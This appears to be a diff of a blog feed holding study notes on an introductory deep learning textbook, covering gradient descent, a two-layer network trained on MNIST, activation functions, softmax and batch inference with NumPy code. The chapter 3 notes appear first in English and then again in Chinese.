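For example, $f(x_0,x_1)=x_0^2-x_1^2$ has a zero gradient at the origin even though the origin is neither a minimum nor a maximum; a quick check with the numerical_gradient defined above:

def saddle(x):
    return x[0] ** 2 - x[1] ** 2 # saddle point at the origin

numerical_gradient(saddle, np.array([0.0, 0.0]))
# array([0., 0.])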

The gradient method goes by different names depending on whether it searches for a minimum or a maximum.

• Searching for a minimum: the gradient descent method.

• Searching for a maximum: the gradient ascent method.

Generally, in neural networks (deep learning), "gradient method" means gradient descent.

$$x_0=x_0-\eta\frac{\partial f}{\partial x_0}\\ x_1=x_1-\eta\frac{\partial f}{\partial x_1}$$

$\eta$ is the update amount, called the learning rate in neural network training. The learning rate determines how much is learned in one step, that is, to what extent the parameters are updated.

def gradient_descent(f, init_x, lr=0.01, step_num=100):
    """
    f is the function to optimize
    init_x is the initial value
    lr is the learning rate
    step_num is the number of gradient-method iterations
    numerical_gradient(f, x) computes the gradient; the parameters are
    updated by the gradient times the learning rate, step_num times over
    """
    x = init_x

    for i in range(step_num):
        grad = numerical_gradient(f, x)
        x -= lr * grad
    return x

Use the gradient method to find the minimum of $f(x_0,x_1)=x_0^2+x_1^2$:

def function_2(x):
    return x[0] ** 2 + x[1] ** 2

init_x = np.array([-3.0, 4.0])
gradient_descent(function_2, init_x=init_x, lr=0.1, step_num=100)
array([-6.11110793e-10,  8.14814391e-10])

If the learning rate is too large, the result diverges to a huge value:

# Example with too large a learning rate: lr=10.0
init_x = np.array([-3.0, 4.0])
gradient_descent(function_2, init_x=init_x, lr=10.0, step_num=100)
array([-2.58983747e+13, -1.29524862e+12])

If the learning rate is too small, learning ends with barely any update:

# Example with too small a learning rate: lr=1e-10
init_x = np.array([-3.0, 4.0])
gradient_descent(function_2, init_x=init_x, lr=1e-10, step_num=100)
array([-2.99999994,  3.99999992])

Parameters like the learning rate are called hyperparameters. They differ in nature from the network's own parameters (weights and biases): whereas the weights are acquired automatically from the training data by the learning algorithm, hyperparameters such as the learning rate are set by hand.

4.4.2 Gradients of a Neural Network

Consider a network whose only parameter is one $2\times3$ weight matrix $\mathbf W$, with loss function $L$. The gradient is then written $\frac{\partial L}{\partial \mathbf W}$.

$$\mathbf W = \begin{pmatrix} w_{11} & w_{12} & w_{13}\\ w_{21} & w_{22} & w_{23} \end{pmatrix}$$

$$\frac{\partial L}{\partial \mathbf W} = \begin{pmatrix}\frac{\partial L}{\partial w_{11}} & \frac{\partial L}{\partial w_{12}} & \frac{\partial L}{\partial w_{13}}\\ \frac{\partial L}{\partial w_{21}} & \frac{\partial L}{\partial w_{22}} & \frac{\partial L}{\partial w_{23}}\end{pmatrix}$$

Let's compute the gradient for a simple example network:

import sys, os
sys.path.append(os.pardir)
import numpy as np
from common.functions import softmax, cross_entropy_error
from common.gradient import numerical_gradient

class simpleNet:
    def __init__(self):
        # Initialize with a Gaussian: randn draws 2x3 samples
        # from the standard normal distribution
        self.W = np.random.randn(2, 3)

    def predict(self, x):
        return np.dot(x, self.W)

    def loss(self, x, t):
        z = self.predict(x)
        y = softmax(z)
        loss = cross_entropy_error(y, t)
        return loss
net = simpleNet()
print(net.W) # the weight parameters
[[ 0.10279342  0.41541928 -0.05036625]
 [-1.08414222  0.75288578  0.93188472]]
x = np.array([0.6, 0.9])
p = net.predict(x)
print(p)
[-0.91405194  0.92684877  0.8084765 ]
np.argmax(p)  # index of the maximum value
1
t = np.array([0, 0, 1])  # the correct-answer label
net.loss(x, t)
0.834766753254781
def f(W):
    """
    The argument W of f(W) is a dummy: numerical_gradient(f, x) calls
    f(x) internally, and f(W) is defined this way for compatibility.
    """
    return net.loss(x, t)

Or, using a lambda expression:

f = lambda w: net.loss(x, t)
dW = numerical_gradient(f, net.W)
print(dW)
[[ 0.04650845  0.29310612 -0.33961457]
 [ 0.06976267  0.43965918 -0.50942185]]

4.5 Implementing the Learning Algorithm

• Premise

  • A neural network has suitable weights and biases; "learning" is the process of adjusting them to fit the training data. It proceeds in the following 4 steps.
• Step 1 (mini-batch)

  • Randomly select a subset of the training data, called a mini-batch. The goal is to reduce the value of the loss function on the mini-batch.
• Step 2 (compute the gradient)

  • To reduce the mini-batch loss, compute the gradient of each weight parameter. The gradient gives the direction in which the loss decreases the most.
• Step 3 (update the parameters)

  • Move the weight parameters a tiny amount along the gradient direction.
• Step 4 (repeat)

  • Repeat steps 1 through 3.

Because the data used here is a randomly chosen mini-batch, the method is also called stochastic gradient descent: "stochastic" means "randomly selected", so it is gradient descent performed on randomly selected data. Many deep learning frameworks implement it in a function named SGD, along the lines of the sketch below.
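A minimal sketch of what such an SGD updater typically does, not any particular framework's API; params and grads are assumed to be dictionaries of NumPy arrays, as in the network class below:

class SGD:
    """Plain stochastic gradient descent: param -= lr * grad."""
    def __init__(self, lr=0.01):
        self.lr = lr

    def update(self, params, grads):
        for key in params.keys():
            params[key] -= self.lr * grads[key]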

4.5.1 A 2-Layer Neural Network Class

import sys, os
sys.path.append(os.pardir)
from common.functions import *
from common.gradient import numerical_gradient

class TwoLayerNet:

    def __init__(self, input_size, hidden_size, output_size, weight_init_std=0.01):
        """
        Initialize the weights.
        params is a dictionary (instance variable) holding the network's parameters.
        input_size: number of neurons in the input layer
        hidden_size: number of neurons in the hidden layer
        output_size: number of neurons in the output layer
        """
        self.params = {}
        self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size)
        self.params['b1'] = np.zeros(hidden_size)
        self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size)
        self.params['b2'] = np.zeros(output_size)

    def predict(self, x):
        """
        Run inference; x is the image data.
        """
        W1, W2 = self.params['W1'], self.params['W2']
        b1, b2 = self.params['b1'], self.params['b2']
        a1 = np.dot(x, W1) + b1
        z1 = sigmoid(a1)
        a2 = np.dot(z1, W2) + b2
        y = softmax(a2)
        return y

    # x: input data, t: supervised data
    def loss(self, x, t):
        """
        Loss function: cross-entropy error.
        """
        y = self.predict(x)

        return cross_entropy_error(y, t)

    def accuracy(self, x, t):
        """
        Compute the recognition accuracy.
        """
        y = self.predict(x)
        y = np.argmax(y, axis=1)
        t = np.argmax(t, axis=1)
        accuracy = np.sum(y == t) / float(x.shape[0])
        return accuracy

    # x: input data, t: supervised data
    def numerical_gradient(self, x, t):
        """
        Compute the gradients of the weight parameters by numerical differentiation.
        grads is a dictionary holding the gradients (this method's return value).
        """
        loss_W = lambda W: self.loss(x, t)
        grads = {}
        grads['W1'] = numerical_gradient(loss_W, self.params['W1'])
        grads['b1'] = numerical_gradient(loss_W, self.params['b1'])
        grads['W2'] = numerical_gradient(loss_W, self.params['W2'])
        grads['b2'] = numerical_gradient(loss_W, self.params['b2'])
        return grads

    def gradient(self, x, t):
        """
        Compute the gradients of the weight parameters by backpropagation.
        grads is a dictionary holding the gradients (this method's return value).
        """
        W1, W2 = self.params['W1'], self.params['W2']
        b1, b2 = self.params['b1'], self.params['b2']
        grads = {}

        batch_num = x.shape[0]

        # forward
        a1 = np.dot(x, W1) + b1
        z1 = sigmoid(a1)
        a2 = np.dot(z1, W2) + b2
        y = softmax(a2)

        # backward
        dy = (y - t) / batch_num
        grads['W2'] = np.dot(z1.T, dy)
        grads['b2'] = np.sum(dy, axis=0)

        da1 = np.dot(dy, W2.T)
        dz1 = sigmoid_grad(a1) * da1
        grads['W1'] = np.dot(x.T, dz1)
        grads['b1'] = np.sum(dz1, axis=0)

        return grads

net = TwoLayerNet(input_size=784, hidden_size=100, output_size=10)
print(net.params['W1'].shape) # (784, 100)
print(net.params['b1'].shape) # (100,)
print(net.params['W2'].shape) # (100, 10)
print(net.params['b2'].shape) # (10,)
(784, 100)
(100,)
(100, 10)
(10,)

4.5.2 Implementing Mini-batch Training

import sys, os
sys.path.append(os.pardir) # so that files in the parent directory can be imported
import numpy as np
import matplotlib.pyplot as plt
from dataset.mnist import load_mnist

# Load the data
(x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)

network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)

iters_num = 10000 # set a suitable number of iterations
train_size = x_train.shape[0]
batch_size = 100 # mini-batch size
learning_rate = 0.1 # learning rate

train_loss_list = []
train_acc_list = []
test_acc_list = []

# Average number of iterations per epoch
iter_per_epoch = max(train_size / batch_size, 1)

for i in range(iters_num):
    batch_mask = np.random.choice(train_size, batch_size)
    x_batch = x_train[batch_mask]
    t_batch = t_train[batch_mask]

    # Compute the gradient
    # grad = network.numerical_gradient(x_batch, t_batch) # numerical differentiation
    grad = network.gradient(x_batch, t_batch) # fast version: backpropagation

    # Update the parameters
    for key in ('W1', 'b1', 'W2', 'b2'):
        network.params[key] -= learning_rate * grad[key]

    loss = network.loss(x_batch, t_batch)
    train_loss_list.append(loss)

    if i % iter_per_epoch == 0:
        # Compute the recognition accuracy once per epoch
        train_acc = network.accuracy(x_train, t_train)
        test_acc = network.accuracy(x_test, t_test)
        train_acc_list.append(train_acc)
        test_acc_list.append(test_acc)
        print("train acc, test acc | " + str(train_acc) + ", " + str(test_acc))

# Plot the results
markers = {'train': 'o', 'test': 's'}
x = np.arange(len(train_acc_list))
plt.plot(x, train_acc_list, label='train acc')
plt.plot(x, test_acc_list, label='test acc', linestyle='--')
plt.xlabel("epochs")
plt.ylabel("accuracy")
plt.ylim(0, 1.0)
plt.legend(loc='lower right')
plt.show()
train acc, test acc | 0.09863333333333334, 0.0958
train acc, test acc | 0.7874166666666667, 0.7928
train acc, test acc | 0.8762, 0.879
train acc, test acc | 0.8973, 0.8996
train acc, test acc | 0.9079166666666667, 0.9098
train acc, test acc | 0.9134333333333333, 0.9155
train acc, test acc | 0.9188, 0.9212
train acc, test acc | 0.9224166666666667, 0.9248
train acc, test acc | 0.9256333333333333, 0.9262
train acc, test acc | 0.92945, 0.9321
train acc, test acc | 0.9319666666666667, 0.9351
train acc, test acc | 0.9360833333333334, 0.9372
train acc, test acc | 0.93865, 0.939
train acc, test acc | 0.9405, 0.9401
train acc, test acc | 0.94285, 0.9412
train acc, test acc | 0.9446333333333333, 0.943
train acc, test acc | 0.9458166666666666, 0.9437

(figure: training and test accuracy per epoch)

As the epochs advance (learning progresses), the recognition accuracy measured on both the training data and the test data improves, and the two accuracies stay essentially identical (the two curves overlap almost completely). We can therefore say that no overfitting occurred in this run.

4.6 Summary

• The data sets used in machine learning are split into training data and test data.

• A neural network learns on the training data, and the test data evaluates the trained model's generalization ability.

• Neural network learning uses a loss function as its metric and updates the weight parameters so as to reduce the loss.

• Computing a derivative from a difference over some tiny given value is called numerical differentiation.

• Numerical differentiation lets us compute the gradients of the weight parameters.

• Numerical differentiation is slow but simple to implement. The somewhat more involved error backpropagation of the next chapter computes gradients fast.

    ]]>
@@ -8198,7 +8198,7 @@ /posts/DL-%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-%E5%9F%BA%E4%BA%8EPython%E7%9A%84%E7%90%86%E8%AE%BA%E4%B8%8E%E5%AE%9E%E7%8E%B0-3-%E7%A5%9E%E7%BB%8F%E7%BD%91%E7%BB%9C/ - Body

3.1 From Perceptrons to Neural Networks

3.1.1 An Example of a Neural Network

We call the leftmost column the input layer, the rightmost column the output layer, and the middle column the middle layer. The middle layer is also called the hidden layer: "hidden" means that, unlike the neurons of the input and output layers, its neurons are not visible. In this book the layers are numbered 0, 1, 2 from input to output (numbering from 0 makes the later Python implementation convenient).

Layer 0 is the input layer, layer 1 the middle layer, and layer 2 the output layer.

(figure: the example network with input, middle, and output layers)

The network in the figure consists of 3 layers of neurons, but only 2 layers actually carry weights, so we call it a "2-layer network". Note that some books count the constituent layers and would call it a "3-layer network". This book names networks by the number of layers that actually hold weights (the total number of input, hidden, and output layers minus 1).

3.1.2 Reviewing the Perceptron

Rewrite the expression

$$y=\left\{\begin{matrix}0\quad (b+w_1x_1+w_2x_2\le 0)\\1\quad(b+w_1x_1+w_2x_2>0)\end{matrix}\right.$$

more compactly by introducing a new function $h(x)$, so that $y=h(b+w_1x_1+w_2x_2)$, where

$$h(x)=\left\{\begin{matrix}0\quad(x\le 0)\\1\quad (x>0)\end{matrix}\right.$$

The sum of the input signals is transformed by the function $h(x)$, and the transformed value is the output $y$.
The function $h(x)$ above returns 1 when the input exceeds 0 and returns 0 otherwise.

3.1.3 Enter the Activation Function

A function like the $h(x)$ that just appeared, which converts the sum of the input signals into the output signal, is generally called an activation function.

$$a=b+w_1x_1+w_2x_2\\ y=h(a)$$

(figure: the activation computation shown explicitly inside a neuron)

The figure makes the activation computation explicit inside the neuron's circle: the weighted sum of the signals is node $a$, and $a$ is converted by the activation function $h()$ into node $y$. In this book the terms "neuron" and "node" mean the same thing; the $a$ and $y$ here are "nodes" in exactly the sense of the earlier "neurons".

3.2 Activation Functions

Among the many candidate activation functions, the perceptron uses the step function. What happens if a perceptron uses some other function as its activation function? In fact, swapping the step function for another function is exactly what takes us into the world of neural networks.

3.2.1 The Sigmoid Function

An activation function used very often in neural networks is the sigmoid function:

$$h(x)=\frac{1}{1+\exp(-x)}$$

3.2.2 Implementing the Step Function

def step_function(x):
    """
    Step function (also accepts a NumPy array as argument).
    """
    y = x > 0
    return y.astype(int)

Applying an inequality operator to a NumPy array applies it to every element, producing a boolean array: elements of x greater than 0 become True and those less than or
equal to 0 become False, yielding the new array y. But y is a boolean array, and the step function we want outputs an int 0 or 1, so the elements of y must be converted from bool to int.

    import numpy as np

    x = np.array([-1.0, 1.0, 2.0])
    y = x > 0
    y
    array([False,  True,  True])
    y = y.astype(int)
    y
    array([0, 1, 1])

3.2.3 Graph of the Step Function

import numpy as np
import matplotlib.pyplot as plt


def step_function(x):
    return np.array(x > 0, dtype=int)

x = np.arange(-5.0, 5.0, 0.1)
y = step_function(x)
plt.plot(x, y)
plt.ylim(-0.1, 1.1) # specify the y-axis range
plt.show()

(figure: graph of the step function)

3.2.4 Implementing the Sigmoid Function

def sigmoid(x):
    return 1 / (1 + np.exp(-x))

x = np.array([-1.0, 1.0, 2.0])
sigmoid(x) # by NumPy broadcasting, an operation between a scalar and a NumPy array is applied to each element of the array
array([0.26894142, 0.73105858, 0.88079708])

x = np.arange(-5.0, 5.0, 0.1)
y = sigmoid(x)
plt.plot(x, y)
plt.ylim(-0.1, 1.1)
plt.show()

(figure: graph of the sigmoid function)

3.2.6 Nonlinear Functions

• A neural network's activation function must be nonlinear (see the sketch below).

  • With a linear activation function, adding layers to the network would be pointless.

  • To benefit from stacking layers, the activation function has to be nonlinear.
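A tiny sketch of why: composing linear layers (here, with no bias and the identity as "activation") collapses into a single linear layer, so the depth adds nothing. The matrices W1 and W2 are illustrative values:

import numpy as np

W1 = np.array([[1.0, 2.0], [3.0, 4.0]])
W2 = np.array([[0.5, 1.0], [1.5, 2.0]])
x = np.array([1.0, 0.5])

deep = np.dot(np.dot(x, W1), W2)    # two "linear layers"
shallow = np.dot(x, np.dot(W1, W2)) # one layer with W = W1 @ W2
print(np.allclose(deep, shallow))   # True: the extra layer was redundant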

3.2.7 The ReLU Function

Historically, the sigmoid function was adopted early in neural networks, but more recently the **ReLU (Rectified Linear Unit)** function is the main choice.

$$h(x)=\left\{\begin{matrix}x\quad(x>0)\\0\quad(x\le0)\end{matrix}\right.$$

def relu(x):
    return np.maximum(0, x)

x = np.arange(-5.0, 5.0, 0.1)
y = relu(x)
plt.plot(x, y)
plt.ylim(-0.1, 5)
plt.show()

(figure: graph of the ReLU function)

3.3 Operations on Multidimensional Arrays

3.3.3 The Neural Network's Matrix Product

(figure: a simple network with weights only)

We take the simple network shown in the figure as our subject. It omits biases and activation functions and keeps only the weights.

$$\mathbf{W} = \begin{pmatrix} 1 & 3 & 5\\ 2 & 4 & 6 \end{pmatrix}$$

When implementing this network, pay attention to the shapes of $\mathbf{X}$, $\mathbf{W}$ and $\mathbf{Y}$; in particular, it is important that the corresponding dimensions of $\mathbf{X}$ and $\mathbf{W}$ have the same number of elements.

    X = np.array([1, 2])
    W = np.array([[1, 3, 5], [2, 4, 6]])
    Y = np.dot(X, W)
    Y
    array([ 5, 11, 17])

Using np.dot (the product of multidimensional arrays), $\mathbf{Y}$ can be computed in one shot. This means that even if $\mathbf{Y}$ had 100 or 1000 elements, a single operation would compute the whole result. Without np.dot, every element of $\mathbf{Y}$ would have to be computed separately (that is, with a for loop), which is tedious; computing everything at once via the matrix product is therefore a very important implementation technique. A sketch of the loop version follows.
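For comparison, the element-by-element version that np.dot replaces would look roughly like this (reusing the X and W from above):

# Same result as np.dot(X, W), computed one element at a time
Y_loop = np.zeros(3)
for j in range(3):
    for i in range(2):
        Y_loop[j] += X[i] * W[i, j]
print(Y_loop) # [ 5. 11. 17.]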

3.4 Implementing a 3-Layer Neural Network

3.4.1 Checking the Notation

(figure: notation for the weights between layers)

3.4.2 Implementing Signal Transmission Between Layers

$$a^{(1)}_1=w^{(1)}_{11}x_1+w^{(1)}_{12}x_2+b^{(1)}_1$$

Using matrix multiplication, the weighted sums of layer 1 can be written as:

$$\mathbf{A}^{(1)}=\mathbf{X}\mathbf{W}^{(1)}+\mathbf{B}^{(1)}$$

where $\mathbf{A}^{(1)}$, $\mathbf{X}$, $\mathbf{B}^{(1)}$ and $\mathbf{W}^{(1)}$ are as follows:

$\mathbf A^{(1)}=\begin{pmatrix} a^{(1)}_1 & a^{(1)}_2 & a^{(1)}_3 \end{pmatrix}$, $\mathbf{X} = \begin{pmatrix} x_1 & x_2 \end{pmatrix}$, $\mathbf{B}^{(1)} = \begin{pmatrix} b^{(1)}_1 & b^{(1)}_2 & b^{(1)}_3 \end{pmatrix}$

$\mathbf{W}^{(1)} = \begin{pmatrix} w^{(1)}_{11} & w^{(1)}_{21} & w^{(1)}_{31} \\ w^{(1)}_{12} & w^{(1)}_{22} & w^{(1)}_{32}\end{pmatrix}$

Signal transmission from the input layer to layer 1:

(figure: input layer to layer 1)

import numpy as np

X = np.array([1.0, 0.5])
W1 = np.array([[0.1, 0.3, 0.5], [0.2, 0.4, 0.6]])
B1 = np.array([[0.1, 0.2, 0.3]])

print(W1.shape)
print(X.shape)
print(B1.shape)
(2, 3)
(2,)
(1, 3)
A1 = np.dot(X, W1) + B1
A1
array([[0.3, 0.7, 1.1]])
Z1 = sigmoid(A1)
Z1
array([[0.57444252, 0.66818777, 0.75026011]])

Implementing the signal transmission from layer 1 to layer 2:

(figure: layer 1 to layer 2)

W2 = np.array([[0.1, 0.4], [0.2, 0.5], [0.3, 0.6]])
B2 = np.array([0.1, 0.2])

print(Z1.shape)
print(W2.shape)
print(B2.shape)
(1, 3)
(3, 2)
(2,)
A2 = np.dot(Z1, W2) + B2
Z2 = sigmoid(A2)

Implementing the signal transmission from layer 2 to the output layer:

(figure: layer 2 to the output layer)

def identity_function(x):
    """
    We define identity_function() (the "identity function") and use it
    as the output layer's activation function. It returns its input
    unchanged, so defining it is not strictly necessary in this example;
    we do it only to keep the flow consistent with the earlier layers.
    """
    return x

W3 = np.array([[0.1, 0.3], [0.2, 0.4]])
B3 = np.array([0.1, 0.2])

A3 = np.dot(Z2, W3) + B3
Y = identity_function(A3) # or: Y = A3

The output layer's activation function is written $\sigma()$, distinguishing it from the hidden layers' $h()$.

The output layer's activation function is chosen according to the nature of the problem being solved.

• Typically, regression problems use the identity function, and binary classification uses the sigmoid function.

• Multi-class classification uses the softmax function.

3.4.3 Implementation Summary

def init_network():
    """
    Following this implementation's convention, only the weights are
    written with capital letters (W1 etc.); everything else (biases,
    intermediate results) uses lower case.
    """
    network = {}
    network['W1'] = np.array([[0.1, 0.3, 0.5], [0.2, 0.4, 0.6]])
    network['b1'] = np.array([0.1, 0.2, 0.3])
    network['W2'] = np.array([[0.1, 0.4], [0.2, 0.5], [0.3, 0.6]])
    network['b2'] = np.array([0.1, 0.2])
    network['W3'] = np.array([[0.1, 0.3], [0.2, 0.4]])
    network['b3'] = np.array([0.1, 0.2])

    return network


def forward(network, x):
    """
    The propagation from input to output.
    """
    W1, W2, W3 = network['W1'], network['W2'], network['W3']
    b1, b2, b3 = network['b1'], network['b2'], network['b3']
    a1 = np.dot(x, W1) + b1
    z1 = sigmoid(a1)
    a2 = np.dot(z1, W2) + b2
    z2 = sigmoid(a2)
    a3 = np.dot(z2, W3) + b3
    y = identity_function(a3)
    return y


network = init_network()
x = np.array([1.0, 0.5])
y = forward(network, x)
print(y)
[0.31682708 0.69627909]

3.5 Designing the Output Layer

3.5.1 Identity Function and Softmax Function

$$y_k=\frac{\exp(a_k)}{\sum^n_{i=1}\exp(a_i)}$$

def softmax(a):
    exp_a = np.exp(a)
    sum_exp_a = np.sum(exp_a)
    y = exp_a / sum_exp_a

    return y

3.5.2 A Caveat when Implementing Softmax

The exponentials involved can overflow.

Improve the formula as follows:

$$
\begin{aligned}
y_k = \frac{\exp(a_k)}{\sum^n_{i=1}\exp(a_i)} &= \frac{C\exp(a_k)}{C\sum^n_{i=1}\exp(a_i)} \\
&= \frac{\exp(a_k+\log C)}{\sum^n_{i=1}\exp(a_i+\log C)} \\
&= \frac{\exp(a_k+C')}{\sum^n_{i=1}\exp(a_i+C')}
\end{aligned}
$$

Here $C$ is an arbitrary constant and we write $C'=\log C$. Any value works for $C'$, but to prevent overflow, one normally uses the maximum of the input signals.

a = np.array([1010, 1000, 990])
np.exp(a) / np.sum(np.exp(a))
RuntimeWarning: overflow encountered in exp
RuntimeWarning: invalid value encountered in true_divide
array([nan, nan, nan])

c = np.max(a)
a - c
array([  0, -10, -20])

np.exp(a-c) / np.sum(np.exp(a-c))
array([9.99954600e-01, 4.53978686e-05, 2.06106005e-09])

Putting this together, softmax can be implemented as follows.

def softmax(a):
    c = np.max(a)
    exp_a = np.exp(a - c) # guard against overflow
    sum_exp_a = np.sum(exp_a)
    y = exp_a / sum_exp_a
    return y

3.5.3 Properties of the Softmax Function

    a = np.array([0.3, 2.9, 4.0])
    y = softmax(a)
    y
    array([0.01821127, 0.24519181, 0.73659691])
    np.sum(y)
    1.0
• The output of softmax is a real number between 0.0 and 1.0.
• The outputs of softmax sum to 1 (see the check below).
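Also, because $\exp$ is monotonically increasing, softmax never changes which element is largest; a quick check on the a defined above:

print(np.argmax(a))          # 2
print(np.argmax(softmax(a))) # 2 -- the ranking of the elements is preserved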

3.5.4 Number of Neurons in the Output Layer

(figure: an output layer sized to the number of classes)

The number of output neurons must be decided according to the problem at hand. For classification, it is normally set to the number of classes.

3.6 Handwritten Digit Recognition

Assuming that learning has already finished, we use the learned parameters to implement the network's "inference processing" first. This inference is also called the network's forward propagation.

3.6.1 The MNIST Dataset

The MNIST image data consists of 28 × 28 pixel grayscale images (1 channel) whose pixel values range from 0 to 255. Each image carries a label such as "7", "2" or "1".

The book provides a convenient Python script, mnist.py, which handles everything from downloading the MNIST dataset to converting it into NumPy arrays (mnist.py lives in the dataset directory). To use mnist.py, the current directory must be one of ch01, ch02, ch03, …, ch08. With the load_mnist() function from mnist.py, the MNIST data can be read in as follows.

import sys, os
sys.path.append(os.pardir) # so that files in the parent directory can be imported
from dataset.mnist import load_mnist

# The first call takes a few minutes...
# load_mnist returns the data as ((training images, training labels), (test images, test labels))
(x_train, t_train), (x_test, t_test) = load_mnist(flatten=True, normalize=False)
Downloading train-images-idx3-ubyte.gz ... Done
Downloading train-labels-idx1-ubyte.gz ... Done
Downloading t10k-images-idx3-ubyte.gz ... Done
Downloading t10k-labels-idx1-ubyte.gz ... Done
Converting train-images-idx3-ubyte.gz to NumPy Array ... Done
Converting train-labels-idx1-ubyte.gz to NumPy Array ... Done
Converting t10k-images-idx3-ubyte.gz to NumPy Array ... Done
Converting t10k-labels-idx1-ubyte.gz to NumPy Array ... Done
Creating pickle file ... Done!

# Print the shape of each array
print(x_train.shape) # (60000, 784)
print(t_train.shape) # (60000,)
print(x_test.shape) # (10000, 784)
print(t_test.shape) # (10000,)
(60000, 784)
(60000,)
(10000, 784)
(10000,)

Let's display an MNIST image and check the data at the same time.

import sys, os
sys.path.append(os.pardir)
import numpy as np
from dataset.mnist import load_mnist
from PIL import Image
import matplotlib.pyplot as plt


def img_show(img):
    pil_img = Image.fromarray(np.uint8(img))
    pil_img.show()

(x_train, t_train), (x_test, t_test) = load_mnist(flatten=True, normalize=False)
img = x_train[0]
label = t_train[0]
print(label) # 5

print(img.shape) # (784,)
img = img.reshape(28, 28) # restore the image to its original dimensions
print(img.shape) # (28, 28)
plt.imshow(img, cmap='gray')
5
(784,)
(28, 28)
<matplotlib.image.AxesImage at 0x1f5a63afca0>

(figure: the first training image, the digit 5)

3.6.2 Inference with the Neural Network

Let's implement neural network inference for this MNIST dataset.
The network has 784 neurons in the input layer and 10 in the output layer.

• The 784 comes from the image size: 28 × 28 = 784.

• The 10 comes from the 10-class classification task (digits 0 through 9).

• The network has 2 hidden layers, with 50 neurons in the first and 100 in the second; the 50 and 100 could be set to any values.

def get_data():
    """
    Fetch the data.
    """
    (x_train, t_train), (x_test, t_test) = \
        load_mnist(normalize=True, flatten=True, one_hot_label=False)
    return x_test, t_test

With normalize set to True, the function internally divides each pixel value by 255 so that the data lies in the range 0.0–1.0 (sketched below). Restricting data to some range like this is called normalization, and applying some fixed transformation to the network's input data is called pre-processing.
Here, normalization is our pre-processing of the input images.
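Internally, that normalization amounts to something like the following one-liner (a sketch of the idea, not the exact mnist.py code):

x = x_train.astype(np.float32) / 255.0 # pixel values now lie in [0.0, 1.0]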

def init_network():
    """
    Read the learned weight parameters stored in the pickle file
    sample_weight.pkl, which holds the weights and biases as a dictionary.
    """
    with open("sample_weight.pkl", 'rb') as f:
        network = pickle.load(f)
    return network

def predict(network, x):
    """
    Forward propagation.
    """
    W1, W2, W3 = network['W1'], network['W2'], network['W3']
    b1, b2, b3 = network['b1'], network['b2'], network['b3']
    a1 = np.dot(x, W1) + b1
    z1 = sigmoid(a1)
    a2 = np.dot(z1, W2) + b2
    z2 = sigmoid(a2)
    a3 = np.dot(z2, W3) + b3
    y = softmax(a3)

    return y
import pickle

x, t = get_data()
network = init_network()

# Take the images stored in x one at a time with a for loop and classify
# each with predict(), which outputs the probability of each label as a
# NumPy array.
accuracy_cnt = 0
for i in range(len(x)):
    y = predict(network, x[i])
    p = np.argmax(y) # index of the element with the highest probability
    if p == t[i]:
        accuracy_cnt += 1

print("Accuracy: " + str(float(accuracy_cnt) / len(x)))
Accuracy: 0.9352

3.6.3 Batch Processing

Print the shapes of the weights in each layer of the network we just used.

    x, _ = get_data()
    network = init_network()
    W1, W2, W3 = network['W1'], network['W2'], network['W3']
    x.shape
    (10000, 784)
    x[0].shape
    (784,)
    W1.shape
    (784, 50)
    W2.shape
    (50, 100)
    W3.shape
    (100, 10)

Looking at the overall flow in Figure 3-26: we feed in a one-dimensional array of 784 elements (originally a 28 × 28 two-dimensional array) and get back a one-dimensional array of 10 elements. This is the flow when a single image is given as input.

(Figure 3-26: processing flow for a single input image)

Now consider feeding in several images bundled together. Suppose we want predict() to process 100 images in one call: we can change the shape of $\mathbf{x}$ to 100 × 784 and pass the 100 images as a single block of input data.

(figure: processing flow for a batch of 100 images)

This bundled input data is called a batch. A batch is a "bundle": the images are strapped together like a wad of bills.

x, t = get_data()
network = init_network()

batch_size = 100 # batch size
accuracy_cnt = 0

# Starting from the sequence produced by range(), x[i:i+batch_size]
# slices a batch out of the input data: it takes the data from index i
# up to index i+batch_size.
for i in range(0, len(x), batch_size):
    x_batch = x[i:i+batch_size]
    y_batch = predict(network, x_batch)
    # axis=1 finds, within the 100 × 10 array, the index of the largest
    # element along the first axis (axis counting starts at 0)
    p = np.argmax(y_batch, axis=1)
    accuracy_cnt += np.sum(p == t[i:i+batch_size])

print("Accuracy:" + str(float(accuracy_cnt) / len(x)))
Accuracy:0.9352

3.7 Summary

• Neural networks use smoothly varying activation functions such as the sigmoid or ReLU function.

• Clever use of NumPy's multidimensional arrays makes neural networks efficient to implement.

• Machine learning problems divide broadly into regression problems and classification problems.

• For the output layer's activation function, regression generally uses the identity function, and classification generally uses softmax.

• In classification, the number of output neurons is set to the number of classes.

• A collection of input data is called a batch. Running inference batch by batch makes the computation fast.

    ]]>
    + 正文

    3.1 从感知机到神经网络

    3.1.1 神经网络的例子

    我们把最左边的一列称为输入层,最右边的一列称为输出层,中间的一列称为中间层。中间层有时也称为隐藏层。“隐藏”一词的意思是,隐藏层的神经元(和输入层、输出层不同)肉眼看不见。另外,本书中把输入层到输出层依次称为第 0 层、第 1 层、第 2 层(层号之所以从 0 开始,是为了方便后面基于 Python 进行实现)。

    第 0 层对应输入层,第 1 层对应中间层,第 2 层对应输出层。

    png

    上图中的网络一共由 3 层神经元构成,但实质上只有 2 层神经元有权重,因此将其称为“2 层网络”。请注意,有的书也会根据构成网络的层数,把上图的网络称为“3 层网络”。本书将根据实质上拥有权重的层数(输入层、隐藏层、输出层的总数减去 1 后的数量)来表示网络的名称。

    3.1.2 复习感知机

    将式子

    $$y=\left{\begin{matrix}0\quad (b+w_1x_1+w_2x_2\le 0)\1\quad(b+w_1x_1+w_2x_2>0)\end{matrix}\right.$$

    改写为更加简洁的式子,引入新函数 $h(x)$:$y=h(b+w_1x_1+w_2x_2)$,其中

    $$h(x)=\left{\begin{matrix}0\quad(x\le 0)\1\quad (x>0)\end{matrix}\right.$$

    输入信号的总和会被函数 $h(x)$ 转换,转换后的值就是输出 $y$。
    然后,上式所表示的函数 $h(x)$,在输入超过 0 时返回 1,否则返回 0。

    3.1.3 激活函数登场

    刚才登场的 $h(x)$ 函数会将输入信号的总和转换为输出信号,这种函数一般称为激活函数(activation function)

    $$a=b+w_1x_1+w_2x_2\y=h(a)$$

    png

